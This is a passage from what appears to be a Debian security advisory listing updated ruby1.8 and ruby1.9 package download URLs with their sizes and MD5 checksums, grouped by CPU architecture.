  http://security.debian.org/pool/updates/main/r/ruby1.8/ri1.8_1.8.5-4etch4_all.deb
    Size/MD5 checksum:  1232694 0f2de56be8bf69925bdd69c0ebdb6e88
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-elisp_1.9.0+20060609-1etch4_all.deb
    Size/MD5 checksum:   229450 c445df6488d98bba432cad422b2d26d2
  http://security.debian.org/pool/updates/main/r/ruby1.9/ri1.9_1.9.0+20060609-1etch4_all.deb
    Size/MD5 checksum:   694310 ba20a22e37fe3128ba68065e81b34be2
  http://security.debian.org/pool/updates/main/r/ruby1.9/rdoc1.9_1.9.0+20060609-1etch4_all.deb
    Size/MD5 checksum:   318608 107093187b68a01e89937e5595ada72f
  http://security.debian.org/pool/updates/main/r/ruby1.8/irb1.8_1.8.5-4etch4_all.deb
    Size/MD5 checksum:   235540 742511548e73ce861aec2ebced3bb820
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-elisp_1.8.5-4etch4_all.deb
    Size/MD5 checksum:   210174 3f151d4c5e251849b7bc82a4c0cc6717
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-examples_1.8.5-4etch4_all.deb
    Size/MD5 checksum:   243302 af6b1eacf4c03bc3fe53e3c2a8e13044

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_alpha.deb
    Size/MD5 checksum:   199212 7450977513c7006dd667426d5499092c
  http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_alpha.deb
    Size/MD5 checksum:   324692 f53f9acfd76ea3a29a8ef4892f2b573a
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_alpha.deb
    Size/MD5 checksum:   237774 e9a60d0d7c8f73357b09bb6188070e21
  http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_alpha.deb
    Size/MD5 checksum:   217606 1479ee1a4b51cb0a75783b2f3844723b
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_alpha.deb
    Size/MD5 checksum:   219472 952a4e672625ce7f2529493b00364604
  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_alpha.deb
    Size/MD5 checksum:   301142 fb710ce9d21ff1fb7f8a3808fcb78d60
  http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_alpha.deb
    Size/MD5 checksum:   216946 515718544ab0101093c6a57e63cb1cb8
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_alpha.deb
    Size/MD5 checksum:   903520 d39e018101c51c880e2cd9895a88a1f8
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_alpha.deb
    Size/MD5 checksum:   961022 f6d226e51af5740c5bda5772cf20e8a8
  http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_alpha.deb
    Size/MD5 checksum:   217630 292a9b82a47bd1bc3c7b4ab440029cca
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_alpha.deb
    Size/MD5 checksum:   198300 653c076799344535ac9b6a791ffb132d
  http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_alpha.deb
    Size/MD5 checksum:  1881422 2eb8f5dd96ced6eac7473eed467c5663
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_alpha.deb
    Size/MD5 checksum:  1869092 3d45f58f803de6208f28d5267be89ecf
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_alpha.deb
    Size/MD5 checksum:   199236 81f0b4078e9412536836f8b973756318
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_alpha.deb
    Size/MD5 checksum:  1074308 f3ec5b9b0349dbc5ef735942a997327c
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_alpha.deb
    Size/MD5 checksum:  1890052 5779555b10f64a438773cbf048ac545c
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_alpha.deb
    Size/MD5 checksum:   340202 69dd9f78aca79c5e05b191d7163a01b4
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_alpha.deb
    Size/MD5 checksum:  1638634 ed825a333226565b4b98b32b93cd1fe6

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_amd64.deb
    Size/MD5 checksum:   807592 464c13292ce358b22247cc998f743562
  http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_amd64.deb
    Size/MD5 checksum:   216630 867bdeff043830d6bad157d1931dc948
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_amd64.deb
    Size/MD5 checksum:   235632 c4ad4cb0bb9cd697534a2c262100c6cc
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_amd64.deb
    Size/MD5 checksum:   198112 17cd7156a45a5aff5c27d82e268a3c4d
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_amd64.deb
    Size/MD5 checksum:  1070604 1bddf59e7b60371ff8099b08bf75ac30
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_amd64.deb
    Size/MD5 checksum:  1850656 aa571b58631a8557f7019d592636f481
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_amd64.deb
    Size/MD5 checksum:   749162 af403f99a95355682a54909929e5199a
  http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_amd64.deb
    Size/MD5 checksum:   216080 a43f4b0559aa2c9b50ea5d7973162aa2
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_amd64.deb
    Size/MD5 checksum:   197652 a9e00dc85e9f2cae38eb09e899130248
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_amd64.deb
    Size/MD5 checksum:   217322 9e02a9f097c955e4400812f0c04d7508
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_amd64.deb
    Size/MD5 checksum:  1830274 53805790080b4cd1daf1a4d63ed8256c
  http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_amd64.deb
    Size/MD5 checksum:  1878288 01c7b13369a8758303404727fea129fd
  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_amd64.deb
    Size/MD5 checksum:   301112 987113850c63d29874841e5faff83d89
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_amd64.deb
    Size/MD5 checksum:   198726 4d65ce2e10feab441a946a18023daf42
  http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_amd64.deb
    Size/MD5 checksum:   216568 93fe5252d04959e64dc6576d95b7c2b6
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_amd64.deb
    Size/MD5 checksum:  1584216 69ed7f6bca37c0c549bf528f773e2900
  http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_amd64.deb
    Size/MD5 checksum:   323450 5baea37cc897959fc20d48ac89de0d74
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_amd64.deb
    Size/MD5 checksum:   345864 c39d9b07d0cb6e4099ca3efeafb5fa6e

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_arm.deb
    Size/MD5 checksum:  1526984 0e6ab8221858243c7145bbc41ecb4e8f
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_arm.deb
    Size/MD5 checksum:   365056 66c7f98e2bb319a62ee7c4c92672c731
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_arm.deb
    Size/MD5 checksum:   196710 9e8c6e4cb718dc719e8fde6b26f962e4
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_arm.deb
    Size/MD5 checksum:   991516 14a9b5cbf719d62dc8353a51afb555a9
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_arm.deb
    Size/MD5 checksum:  1859122 e0c7c1e7d2ccf0e49bce45e7e7bf1278
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_arm.deb
    Size/MD5 checksum:  1792772 d56d498189d5406b5020d9d924117e7c
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_arm.deb
    Size/MD5 checksum:   197418 d26ec8fb413c9ebab080bedea93722b1
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_arm.deb
    Size/MD5 checksum:   197808 a36c730da4bcea2d72f5d370322eb30f
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_arm.deb
    Size/MD5 checksum:   792994 579ec1a30cd9a1cbd8bf67aa06dc4d24
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_arm.deb
    Size/MD5 checksum:   697246 ca45d9a326d51f5434d1621abcece266
  http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_arm.deb
    Size/MD5 checksum:   216240 423493a419191c35b8b3e80a1f1f1c9c
  http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_arm.deb
    Size/MD5 checksum:   216324 a266f8778f5e7d613db6ba3f15adb763
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_arm.deb
    Size/MD5 checksum:   237202 5fc7e98291401cd3fe917ed05d9bd015
  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_arm.deb
    Size/MD5 checksum:   287576 eced197b837fe4d62c03b20bed6815be
  http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_arm.deb
    Size/MD5 checksum:  1876264 bc351c3337a5d5987f6ddb836768922e
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_arm.deb
    Size/MD5 checksum:   219386 3f0b1eb14311c982d63ebd0fab64f5f4
  http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_arm.deb
    Size/MD5 checksum:   215572 2c0ccc988ac6ea3250f8dc367ccaa2a2
  http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_arm.deb
    Size/MD5 checksum:   311564 8dfe07d2f7dcf8275e8ad8f41dcda0c0

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_hppa.deb
    Size/MD5 checksum:   218160 513b9ae768f77d80a13fa851e1c8f4f7
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_hppa.deb
    Size/MD5 checksum:   824152 6146a8f873531c0ed8cf0d06d2e17d2c
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_hppa.deb
    Size/MD5 checksum:   395602 6cc76b78245992c6a68b9e078ae89d53
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_hppa.deb
    Size/MD5 checksum:   199900 d70a4e3bc2ced6217727543e7fe0f9b0
  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_hppa.deb
    Size/MD5 checksum:   316214 4e6641aa45421ffab8b99ab8a9e8d16a
  http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_hppa.deb
    Size/MD5 checksum:   217620 85109a63b0b20068f6320cda8f3ec6ad
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_hppa.deb
    Size/MD5 checksum:   237090 a3d1415f5a1ad8238d56b050975189e9
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_hppa.deb
    Size/MD5 checksum:   200304 783f82fe9eac7aa259a35479cc2a47e7
  http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_hppa.deb
    Size/MD5 checksum:  1880858 9ab71d7b85b97c1f2d2aa3500b9ce7c1
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_hppa.deb
    Size/MD5 checksum:  1040322 02afc219d2b174b059881ec0a83356fc
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_hppa.deb
    Size/MD5 checksum:  1861536 432efb1fffc5c2b1d9cc7b74ae7baa39
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_hppa.deb
    Size/MD5 checksum:   199202 84de055812481012c4876c17833ce3b0
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_hppa.deb
    Size/MD5 checksum:  1869258 834f2dbf84ab6697d7980d3658290cfd
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_hppa.deb
    Size/MD5 checksum:   219214 801a3641d72145d568a6c0c88ef43bd8
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_hppa.deb
    Size/MD5 checksum:   888950 464ded03bf97abbc0d417b089fa87d60
  http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_hppa.deb
    Size/MD5 checksum:   217980 2535726a60b609b1a55fc310328df532
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_hppa.deb
    Size/MD5 checksum:  1677084 d5b606c636b8cd27143ce002d0ed2ce9
  http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_hppa.deb
    Size/MD5 checksum:   333772 38a4c8fef89fde902a0be85e59fe8a8f

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_i386.deb
    Size/MD5 checksum:   197974 e282a6d8268ef83c156a860fb8a16a7c
  http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_i386.deb
    Size/MD5 checksum:   216404 82cf3992d705f2e9b88a915e352ca934
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_i386.deb
    Size/MD5 checksum:  1530904 7f21db178c88933c5e077890402de73f
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_i386.deb
    Size/MD5 checksum:  1752738 3291630941e3dbb88efb8a97f33c208b
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_i386.deb
    Size/MD5 checksum:   217116 6d9fbeeb9354b35e033f036109c3187c
  http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_i386.deb
    Size/MD5 checksum:   216638 513608a225ce87330453e9b1bd910f34
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_i386.deb
    Size/MD5 checksum:  1001838 64e08e52fac509f2bcdec25fed6fdc07
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_i386.deb
    Size/MD5 checksum:   719438 d568135366f021f1511e186201475268
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_i386.deb
    Size/MD5 checksum:   197348 8fec8e658d39d42c2857475ef279f08d
  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_i386.deb
    Size/MD5 checksum:   290114 69d7bdf1893fe305a003fbcaf264c9e4
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_i386.deb
    Size/MD5 checksum:  1821730 a79338c8bfea54d6c6e78f85fb0aaa4d
  http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_i386.deb
    Size/MD5 checksum:  1867788 9258d6168a057238d5dd1ead02513e74
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_i386.deb
    Size/MD5 checksum:   758004 40c77b36b3a2b061db9c16b4a01f4391
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_i386.deb
    Size/MD5 checksum:   237546 2e1c1a544086d57780f3ae4bb02da9c0
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_i386.deb
    Size/MD5 checksum:   345762 cb32b33017f36b17cc06cc8ed90414b9
  http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_i386.deb
    Size/MD5 checksum:   309632 3202e1f7f3c9eb0b6062148b9af7e788
  http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_i386.deb
    Size/MD5 checksum:   215662 1cd102a588e1082716a0858dbc5891d0
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_i386.deb
    Size/MD5 checksum:   197442 c38974894410e79acf7931fc0e8dad54

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_ia64.deb
    Size/MD5 checksum:   330612 0887a43e2d62199cc73660039d7f1919
  http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_ia64.deb
    Size/MD5 checksum:   351174 1bb59b9997961359cb20c9fb6945a0f0
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_ia64.deb
    Size/MD5 checksum:   351444 5918b0c479ee79cc7466484c76e6dd98
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_ia64.deb
    Size/MD5 checksum:  2225792 c780194abaeac68b844bc6fcd411376d
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_ia64.deb
    Size/MD5 checksum:   971834 e280240763deda9e120b41faf64b47e2
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_ia64.deb
    Size/MD5 checksum:   203432 7430326aeac7519e33b7ca34a77c1779
  http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_ia64.deb
    Size/MD5 checksum:   220188 1b368e296ab170d1e005f600cada244f
  http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_ia64.deb
    Size/MD5 checksum:  1864142 76176efd4132f6dd862946935368e2d6
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_ia64.deb
    Size/MD5 checksum:   218646 4c1088b7f7002d3223ca0a33e27eaa0e
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_ia64.deb
    Size/MD5 checksum:  1095818 64f6c9fd95b4c6af5cdfade1b958e9c8
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_ia64.deb
    Size/MD5 checksum:   236376 d8ffa9e36d27c315bf12543035067d4b
  http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_ia64.deb
    Size/MD5 checksum:   220668 62f25d6880a721afac92d5fbd08ee714
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_ia64.deb
    Size/MD5 checksum:   202476 a5d3f5c7b7c963ecd5ab916315deb460
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_ia64.deb
    Size/MD5 checksum:  1024524 c406606563dae3bf9ad255a4c0c8344f
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_ia64.deb
    Size/MD5 checksum:  1895844 ea86b262fda8dc1dee04a1348abffbca
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_ia64.deb
    Size/MD5 checksum:   201506 22ba7b847e836fd960b0cb53358c106b
  http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_ia64.deb
    Size/MD5 checksum:   220662 6f066d4dbe40ba488e1ae2e883dc6262
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_ia64.deb
    Size/MD5 checksum:  1861880 e3b9fcda55d44a6b921140fc49cdbecc

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_mips.deb
    Size/MD5 checksum:   215262 4d2fe03f92af44b8362661b562b21754
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_mips.deb
    Size/MD5 checksum:  1084552 2d2dac8ed50123fdb90d733e9cf9b855
  http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_mips.deb
    Size/MD5 checksum:  1862110 3b49c520a4ce20c6d6fcc11319a182e1
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_mips.deb
    Size/MD5 checksum:  1680280 bf7a624e97e372c4bbfc2fe769ff8974
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_mips.deb
    Size/MD5 checksum:   197456 8c980f163be8105285609fdd454e1977
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_mips.deb
    Size/MD5 checksum:   236198 81b996367fc453a8ceb3a531501253de
  http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_mips.deb
    Size/MD5 checksum:   301628 bb1dc6aa3461335e4a9b419cd267ee65
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_mips.deb
    Size/MD5 checksum:   874228 a5cc44dbd1cc80f8eef1a159ab3189f3
  http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_mips.deb
    Size/MD5 checksum:   216100 f2360af30afc204b9226bf5cc0863853
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_mips.deb
    Size/MD5 checksum:   197594 fca3406a3b55cfdc69c8989b072ca031
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_mips.deb
    Size/MD5 checksum:   802420 6699c1bd4709051c910fc0bfe68c9b37
  http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_mips.deb
    Size/MD5 checksum:   215980 2d9003c25275e1fd5ee6c53d959344f7
  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_mips.deb
    Size/MD5 checksum:   281536 fe8d5b309e7ab0be35e721e6b3ac97dd
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_mips.deb
    Size/MD5 checksum:   217990 f096260bda09b34a2c2f8cf018c80ae1
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_mips.deb
    Size/MD5 checksum:  1850962 60c4d783bcb2d0f852aa38fac3cad1d5
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_mips.deb
    Size/MD5 checksum:   196670 16d12b430464de86499d897c2a28b213
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_mips.deb
    Size/MD5 checksum:  1540332 5b40f3e2137e7753b54b3202a02f2fa9
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_mips.deb
    Size/MD5 checksum:   372286 2a9d8fc201caad40ceefb3cbd2a61d12

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_mipsel.deb
    Size/MD5 checksum:   218178 0298e98b39cbf08fa18d4fe0d617df41
  http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb
    Size/MD5 checksum:   215442 2c78e52c5e2a619a0d3b436c1a887a53
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_mipsel.deb
    Size/MD5 checksum:  1538434 b88e43e5cec1aacf83a598dab477c3ab
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_mipsel.deb
    Size/MD5 checksum:  1667992 01b49904e244952345158c4e22006a42
  http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb
    Size/MD5 checksum:   299462 1e7905d97c9ec5f2dffdd8dd22b48002
  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_mipsel.deb
    Size/MD5 checksum:   279298 5823c4a9baf7975c73eb6d36047dfed4
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_mipsel.deb
    Size/MD5 checksum:  1059442 dba878a9064478b59f1548cf661041f7
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_mipsel.deb
    Size/MD5 checksum:   793388 f945925d054d92aba8ca6f7e46a685ee
  http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb
    Size/MD5 checksum:   216340 c676c1ea64ad2b41ee571249b99568d9
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_mipsel.deb
    Size/MD5 checksum:   197742 9dfdbf8675ab4a56dfbfdeaa7bb6f733
  http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb
    Size/MD5 checksum:   216192 3ec8e74d7b723d246719dd9227862c8a
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_mipsel.deb
    Size/MD5 checksum:   367552 b0a7a4121cca96fc576497e5eeb7d664
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_mipsel.deb
    Size/MD5 checksum:   858608 9f415ec47bba07a78331e26e35300a5b
  http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb
    Size/MD5 checksum:  1837532 6face0d7dcc576c00e564c66d5e78d42
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_mipsel.deb
    Size/MD5 checksum:   198096 80b334507f4cbfc62b2a439e5d6f3f2e
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_mipsel.deb
    Size/MD5 checksum:   235700 826646ac1e00564ab805d15ac64659bd
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_mipsel.deb
    Size/MD5 checksum:   197150 b5c725b9fe159d6b3ddb9a1d607d5516
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_mipsel.deb
    Size/MD5 checksum:  1830428 4123d91e58c7e5f0c4a784d5087f929e

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb
    Size/MD5 checksum:   218314 45b937607b0c710f9651a88e3c77734a
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_powerpc.deb
    Size/MD5 checksum:  1808952 c905cd43d26918def2c2110b0d0787b8
  http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb
    Size/MD5 checksum:  1844840 4698433b87fa56b6f7c8cf581f9ad4c0
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_powerpc.deb
